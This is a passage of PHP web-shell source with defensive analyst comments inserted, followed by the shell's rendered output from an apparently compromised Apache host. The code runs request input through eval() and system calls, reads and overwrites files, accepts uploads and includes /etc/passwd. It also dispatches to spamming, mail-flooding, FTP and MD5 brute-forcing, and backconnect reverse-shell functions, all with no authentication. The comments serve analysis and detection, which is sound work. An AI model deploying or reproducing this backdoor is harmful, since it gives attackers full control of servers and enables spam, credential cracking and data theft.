459 | $out = ob_get_contents();
460 | ob_end_clean();
461 | }
462 | elseif(function_exists('system'))
463 | {
464 | ob_start();
465 | system($in);
466 | $out = ob_get_contents();
467 | ob_end_clean();
468 | }
469 | elseif(function_exists('shell_exec'))
470 | {
471 | $out = shell_exec($in);
472 | }
473 | elseif(is_resource($f = popen($in,"r")))
474 | {
475 | $out = "";
476 | while(!@feof($f)) { $out .= fread($f,1024); }
477 | pclose($f);
478 | }
479 | return $out;
480 | }
481 |
/**
 * shell(): request dispatcher of the web shell. Selects an action from
 * $_POST['type'] and feeds it request values after stripslashes().
 *
 * Dispatch table as listed:
 *   1      eval() of $_POST['value'] as PHP code
 *   2      pwd(), then ex() on $_POST['value'], printed with print_r()
 *   3      directory listing: safe_ex() when $_SESSION['safe_mode'] is 1,
 *          otherwise ex('ls -la') with ex('dir') as fallback
 *   4      read the named file and echo it HTML-escaped; remembers the name in
 *          $_SESSION['filename'] and sets $_SESSION['edit']
 *   5      overwrite $_SESSION['filename'] with $_POST['value']
 *   6      move an uploaded file into pwd(), optionally under $_POST['newname']
 *   7      alias()
 *   8      spammer()
 *   9      ftp_brute()
 *   10     flooder()
 *   12,13  backconnect()
 *   14     md5_brute()
 *   other  ex('ls -la') with ex('dir') as fallback
 * Type 11 (download) is handled by a top-level statement, not here.
 *
 * Analyst notes (defensive reading of the listing):
 *  - No authentication, authorization or CSRF check appears in this function;
 *    stripslashes() is the only transformation applied to request values.
 *  - Types 1, 2, 5 and 6 give arbitrary PHP execution, command execution,
 *    file write and file upload respectively.
 *  - Indicators visible here: POST requests to a single .php file carrying a
 *    numeric "type" field together with "value", "newname", "userfile",
 *    "elist", "logf", "dict" or similar field names.
 *
 * @return mixed directory-listing text or an error string for some types;
 *               null otherwise
 */
482 | function shell()
483 | {
484 | if($_POST['type']==1)
485 | {
486 | eval(stripslashes($_POST['value'])); // request body executed as PHP
487 | }
488 | elseif($_POST['type']==2)
489 | {
490 | pwd();
491 | print_r(ex(stripslashes($_POST['value'])));
492 | }
493 | elseif($_POST['type']==3)
494 | {
495 | if($_SESSION['safe_mode'] == 1){
496 | if(($u=safe_ex('ls -la'))!='')
497 | {return $u;}else{return safe_ex('dir');};
498 |
499 | }else{
500 | if(($u=ex('ls -la'))!='')
501 | {return $u;}else{return ex('dir');};
502 | }
503 | }
504 | elseif($_POST['type']==4)
505 | {
506 | if(file_exists(stripslashes($_POST['value'])))
507 | {
508 | if($safe_mode!=1){
509 | echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']),"rw"),filesize(stripslashes($_POST['value']))));
510 | }else{
511 | echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));
512 | };
513 | $_SESSION['edit']=1;
514 | $_SESSION['filename'] = $_POST['value'];
515 | }else{
516 | return 'File doesn\'t exists!';
517 | }
518 | }
519 | elseif($_POST['type']==5)
520 | {
521 | fputs(fopen($_SESSION['filename'],"w"),stripslashes($_POST['value']));
522 | }
523 | elseif($_POST['type']==6)
524 | {
525 | $uploaddir = pwd();
526 | if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
527 | move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
528 | }
529 | elseif($_POST['type']==7)
530 | {
531 | echo alias($_POST['value']);
532 | }
533 | elseif($_POST['type']==8)
534 | {
535 | echo spammer(stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['check']),stripslashes($_POST['elist']),stripslashes($_POST['logf']));
536 | }
537 | elseif($_POST['type']==9)
538 | {
539 | echo ftp_brute(stripslashes($_POST['host']),stripslashes($_POST['users']),stripslashes($_POST['passwd']),stripslashes($_POST['log']));
540 | }
541 | elseif($_POST['type']==10)
542 | {
543 | echo flooder(stripslashes($_POST['log']),stripslashes($_POST['to']),stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['amount']),stripslashes($_POST['check']));
544 | }
545 | elseif($_POST['type']==12)
546 | {
547 | echo backconnect(stripslashes($_POST['ip']),stripslashes($_POST['port']),stripslashes($_POST['method']));
548 | }
549 | elseif($_POST['type']==13)
550 | {
551 | echo backconnect(stripslashes($_POST['port']),stripslashes($_POST['pass']),stripslashes($_POST['method']));
552 | }
553 | elseif($_POST['type']==14)
554 | {
555 | echo md5_brute(stripslashes($_POST['hash']),stripslashes($_POST['log']),stripslashes($_POST['dict']));
556 | }
557 |
558 | else
559 | {$u = ex('ls -la');
560 | if($u == ''){return ex('dir');}else{return $u;};
561 | }
562 |
563 | return null;
564 | };
565 |
/**
 * edit(): one-shot flag consumer for the file editor.
 *
 * When $_SESSION['edit'] is 1 (set by shell() after a file is read with
 * type 4), the flag is reset to 0 and a string literal is returned. In this
 * listing the literal holds only a line break; any markup it may have
 * contained is not visible here.
 *
 * @return string|null the literal when the flag was set; otherwise nothing
 */
566 | function edit()
567 | {
568 | if ($_SESSION['edit'] == 1){
569 | $_SESSION['edit']=0;
570 | return "
";};
571 | }
572 |
/**
 * getsystem(): host fingerprint string. Joins php_uname('s'), php_uname('r')
 * and php_uname('v') (OS name, release, version) with single spaces.
 *
 * @return string OS name, release and version
 */
573 | function getsystem()
574 | {
575 | return php_uname('s')." ".php_uname('r')." ".php_uname('v');
576 | };
577 |
/**
 * getserver(): returns the SERVER_SOFTWARE environment value, i.e. the web
 * server's self-reported banner.
 *
 * @return string|false value of getenv("SERVER_SOFTWARE")
 */
578 | function getserver()
579 | {
580 | return getenv("SERVER_SOFTWARE");
581 | };
582 |
583 |
/**
 * getuser(): reports the account the script runs as.
 *
 * Starts from get_current_user(). Unless that is "SYSTEM", it runs "id"
 * through ex() and uses the output; when the command returns nothing it falls
 * back to a "uid=...(name) gid=..." string built from getmyuid(),
 * get_current_user() and getmygid(). An "id" process spawned by the web
 * server account is a small indicator.
 *
 * @return string account description
 */
584 | function getuser()
585 | {
586 | $out = get_current_user();
587 | if($out!="SYSTEM")
588 | {
589 | if(($out=ex('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();};
590 | }
591 | return $out;
592 | };
593 |
/**
 * pwd(): tracks and returns the shell's working directory.
 *
 * Analyst notes (defensive reading of the listing):
 *  - When $_POST['type'] is 3, the request value replaces $_SESSION['pwd'].
 *  - The process then chdir()s to $_SESSION['pwd'], so the working directory
 *    follows the requester across requests through the session.
 *  - The current directory is returned with a trailing '/' or '\\' appended
 *    when it does not already end in one; shell() uses this as the upload
 *    destination prefix.
 *
 * @return string|null current directory with trailing separator
 */
594 | function pwd()
595 | {
596 | if($_POST['type']==3)
597 | {
598 | $_SESSION['pwd'] = stripslashes($_POST['value']);
599 | }
600 | chdir($_SESSION['pwd']);
601 | $cwd = getcwd();
602 | if($u=strrpos($cwd,'/'))
603 | {
604 | if($u!=strlen($cwd)-1){
605 | return $cwd.'/';}
606 | else{return $cwd;};
607 | }
608 | elseif($u=strrpos($cwd,'\\'))
609 | {
610 | if($u!=strlen($cwd)-1){
611 | return $cwd.'\\';}
612 | else{return $cwd;};
613 | };
614 | }
615 |
/**
 * safe_ex(): directory listing written in PHP only, used by shell() when
 * command execution is flagged as unavailable ($_SESSION['safe_mode'] == 1).
 *
 * Analyst notes (defensive reading of the listing):
 *  - Walks the current directory with dir()/read() and stat(), echoing one
 *    line per entry; no external command is spawned, so process auditing does
 *    not see this path. File-access auditing and open_basedir restrictions are
 *    the relevant controls.
 *  - As the braces are laid out in this listing, safe_read() is declared
 *    inside safe_ex()'s body.
 *  - safe_read() echoes the safe_mode and open_basedir ini values, includes
 *    /etc/passwd, calls ini_restore() on both settings, echoes them again and
 *    then calls file_get_contents($in) without using the result.
 *
 * @param string $in listing is produced only when this is truthy
 * @return void output is echoed directly
 */
616 | function safe_ex($in)
617 | {
618 | if($in){
619 | $d=dir('.');
620 |
621 | while (false!==($file=$d->read()))
622 | {
623 | if ($file=="." || $file=="..") continue;
624 | @clearstatcache();
625 | list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
626 | if(!$unix){
627 | echo date("d.m.Y H:i",$mtime)." ";
628 | if(@is_dir($file)) echo " "; else printf("% 7s ",$size);
629 | }
630 | else{
631 | $owner = @posix_getpwuid($uid);
632 | $grgid = @posix_getgrgid($gid);
633 | echo $inode." ";
634 | echo perms(@fileperms($file));
635 | printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
636 | echo date("d.m.Y H:i ",$mtime);
637 | }
638 | echo "$file\n";
639 | }
640 | $d->close();
641 | }
642 |
643 | function safe_read($in)
644 | {
645 | echo ini_get("safe_mode");
646 | echo ini_get("open_basedir");
647 | include("/etc/passwd");
648 | ini_restore("safe_mode");
649 | ini_restore("open_basedir");
650 | echo ini_get("safe_mode");
651 | echo ini_get("open_basedir");
652 |
653 | file_get_contents($in);
654 | }
655 |
656 | }
657 | ?>
658 |
659 |
660 |
661 |
662 |
663 |
664 |
665 |
666 |
667 |
668 |
669 |
670 | .::Black Hat | Ethical Hacking | Special Webshell | Educational Purpose Only::.
671 |
672 |
680 |
691 |
692 |
693 |
694 |
695 |
696 |
697 |
698 |
699 | System:
700 | |
701 |
702 |
703 | |
704 |
705 | Server:
706 | |
707 |
708 |
709 | |
710 |
711 | User:
712 | |
713 |
714 |
715 | |
716 |
717 | pwd:
718 | |
719 |
720 | 45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};?>
721 | |
722 |
723 | |
724 |
725 |
738 |
739 | |
740 |
741 |
742 |
743 |
744 |
745 | PHP-version:
746 | |
747 |
748 | MySQL:
749 | |
750 |
751 | MSSQL:
752 | |
753 |
754 | PostgreSQL:
755 | |
756 |
757 | Oracle:
758 | |
759 |
760 | |
761 |
762 |
763 |
764 | |
765 |
766 |
767 | |
768 |
769 |
770 | |
771 |
772 |
773 | |
774 |
775 |
776 | |
777 |
778 | | |
779 |
780 |
781 | Safe_mode:
782 | |
783 |
784 | cURL:
785 | |
786 |
787 | wget:
788 | |
789 |
790 | fetch:
791 | |
792 |
793 | lynx:
794 | |
795 | |
796 |
797 |
798 |
799 | |
800 |
801 |
802 | |
803 |
804 |
805 | |
806 |
807 |
808 | |
809 |
810 |
811 | |
812 | |
813 | |
814 |
815 |
816 | Perl:
817 | |
818 |
819 | Server time:
820 | |
821 |
822 | Server date:
823 | |
824 |
825 | Total space:
826 | |
827 |
828 | Free space:
829 | |
830 | |
831 |
832 |
833 |
834 | |
835 |
836 |
837 | |
838 |
839 |
840 | |
841 |
842 |
843 | |
844 |
845 |
846 | |
847 | |
848 |
849 | |
850 |
851 | |
852 |
853 |
854 |
855 |
856 |
857 |
862 | |
863 |
864 |
865 |
866 |
867 |
889 | |
890 |
891 |
894 |
895 |
896 | |
908 |
920 | |
921 |
922 | |
934 |
949 | |
950 | |
993 |
1108 |
1109 |
1127 | |
1128 |
1129 |
1130 | | |
1131 |
1132 |
1133 |
1134 | |
1163 |
1164 | | |
1165 |
1166 |
1167 | |
1196 |
1197 | | |
1198 |
1223 | |
1224 | | |
1225 |
1226 |
1359 | |
1360 |
1361 | |
1362 |
1363 | .:[Public v1.0]:.
1364 |
1365 |
1366 |
1367 |
1368 |
1369 |
1370 |
1371 |
1372 |
1373 |
1374 |
1375 |
1376 |
1377 |
1378 |
1379 |
1380 | .::Black Hat | Ethical Hacking | Special Webshell | Educational Purpose Only::.
1381 |
1382 |
1390 |
1401 |
1402 |
1403 |
1404 |
1405 |
1406 |
1407 |
1408 |
1409 | System:
1410 | |
1411 |
1412 | Linux 4.9.26v7-aufs #1 SMP Tue May 9 20:14:03 CEST 2017
1413 | |
1414 |
1415 | Server:
1416 | |
1417 |
1418 | Apache/2.4.29 (Debian)
1419 | |
1420 |
1421 | User:
1422 | |
1423 |
1424 | uid=33(www-data) gid=33(www-data) groups=33(www-data)
1425 | |
1426 |
1427 | pwd:
1428 | |
1429 |
1430 | /var/www/html/
1431 | |
1432 |
1433 | |
1434 |
1435 |
1448 |
1449 | |
1450 |
1451 |
1452 |
1453 |
1454 |
1455 | PHP-version:
1456 | |
1457 |
1458 | MySQL:
1459 | |
1460 |
1461 | MSSQL:
1462 | |
1463 |
1464 | PostgreSQL:
1465 | |
1466 |
1467 | Oracle:
1468 | |
1469 |
1470 | |
1471 |
1472 |
1473 | 7.2.4-1
1474 | |
1475 |
1476 | OFF
1477 | |
1478 |
1479 | OFF
1480 | |
1481 |
1482 | OFF
1483 | |
1484 |
1485 | OFF
1486 | |
1487 |
1488 | | |
1489 |
1490 |
1491 | Safe_mode:
1492 | |
1493 |
1494 | cURL:
1495 | |
1496 |
1497 | wget:
1498 | |
1499 |
1500 | fetch:
1501 | |
1502 |
1503 | lynx:
1504 | |
1505 | |
1506 |
1507 |
1508 | OFF
1509 | |
1510 |
1511 | OFF
1512 | |
1513 |
1514 | ON
1515 | |
1516 |
1517 | OFF
1518 | |
1519 |
1520 | OFF
1521 | |
1522 | |
1523 | |
1524 |
1525 |
1526 | Perl:
1527 | |
1528 |
1529 | Server time:
1530 | |
1531 |
1532 | Server date:
1533 | |
1534 |
1535 | Total space:
1536 | |
1537 |
1538 | Free space:
1539 | |
1540 | |
1541 |
1542 |
1543 | ON
1544 | |
1545 |
1546 | 02:09
1547 | |
1548 |
1549 | 20-05-2018
1550 | |
1551 |
1552 | 28.27 GB
1553 | |
1554 |
1555 | 10.51 GB
1556 | |
1557 | |
1558 |
1559 | |
1560 |
1561 | |
1562 |
1563 |
1564 |
1565 |
1566 |
1567 |
1568 |
1569 |
1585 | |
1586 |
1587 |
1588 |
1589 |
1590 |
1612 | |
1613 |
1614 |
1617 |
1618 |
1619 |
1620 | |
1631 |
1632 |
1643 | |
1644 |
1645 |
1646 | |
1657 |
1658 |
1672 | |
1673 |
1674 | |
1716 |
1831 |
1832 |
1833 |
1850 | |
1851 |
1852 |
1853 | | |
1854 |
1855 |
1856 |
1857 |
1858 |
1885 | |
1886 |
1887 | | |
1888 |
1889 |
1890 |
1891 |
1918 | |
1919 |
1920 | | |
1921 |
1946 | |
1947 | | |
1948 |
1949 |
1950 |
1951 |
1995 |
1996 |
1997 |
2027 |
2028 |
2029 |
2080 | |
2081 | | |
2082 | |
2083 |
2084 | |
2085 |
2086 | .:[Public v1.0]:.
2087 |
2088 |
2089 |
--------------------------------------------------------------------------------